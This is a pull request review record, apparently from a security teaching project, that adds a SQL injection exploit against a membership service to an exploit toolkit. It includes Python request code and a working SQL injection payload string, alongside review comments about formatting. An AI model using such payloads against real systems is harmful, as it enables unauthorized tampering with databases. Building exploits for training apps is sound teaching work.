### PR TITLE
Feature/add dotnet sql injection to exploit toolkit

### PR DESCRIPTION
**Pull request by sassko**
This PR adds the .NET exploit to the exploit-toolkit and improves the documentation in that regard.

### CODE REVIEW

File: exploit-toolkit/exploit.py [hunk 1]
```diff
@@ -319,6 +319,44 @@ def sql_inject_h2(sql_command, target):
     click.echo('Request returned status code %s.' % str(r.status_code))
     click.secho('Exploit executed.', fg="green")
```
Comment (orazefabian) [inline exploit-toolkit/exploit.py:321]: [NIT] add another empty line for consistency

File: exploit-toolkit/exploit.py [hunk 2]
```diff
@@ -319,6 +319,44 @@ def sql_inject_h2(sql_command, target):
...
+    r = session.post(f'http://{target + frontend_base_path}/membership/{username}', data={'membershipText': sql_command},
+                     allow_redirects=False)
+
+    click.echo('Request returned status code %s.' % str(r.status_code))
+    # status code 400 is returned if e.g. the table is truncated and no membership exists anymore
+    if r.status_code == 302 or r.status_code == 400:
+        click.secho('Exploit executed.', fg="green")
+    else:
+        click.secho('Exploit failed.', fg="red")
+
```
Comment (orazefabian) [inline exploit-toolkit/exploit.py:359]: [NIT] add another empty line for consistency

**Comment by orazefabian** [comment]
Tried it out locally, works as expected 👍🏼

**Review by W3D3 — APPROVED** [review]
Approved with regards to @orazefabian 's feedback :+1:

File: exploit-toolkit/exploits/sql-injection/SQLI-MEMBERSHIP-SERVICE-MARIADB.md [hunk 3]
```diff
@@ -0,0 +1,71 @@
...
+```
+ hacked") ON DUPLICATE KEY UPDATE membership="hacked"; --
+```
+
+This snippet can simply be added to the membership freetext field, giving the current user the membership 'hacked'.
+
+### With Toolkit CLI
+
+Using the `ug-exploit` tool, SQL statements can be injected.
+Make sure to use `ug-exploit login` first, as you need to be logged in to post a bio.
```
Comment (W3D3) [inline exploit-toolkit/exploits/sql-injection/SQLI-MEMBERSHIP-SERVICE-MARIADB.md:48]: [ISSUE] We're not posting bios here, but changing memberships.

Comment (sassko) [reply exploit-toolkit/exploits/sql-injection/SQLI-MEMBERSHIP-SERVICE-MARIADB.md]: fixed

File: exploit-toolkit/exploit.py (hunk 1 above)
Comment (sassko) [reply exploit-toolkit/exploit.py:321]: fixed

File: exploit-toolkit/exploit.py (hunk 2 above)
Comment (sassko) [reply exploit-toolkit/exploit.py:360]: fixed

**Pull request merged**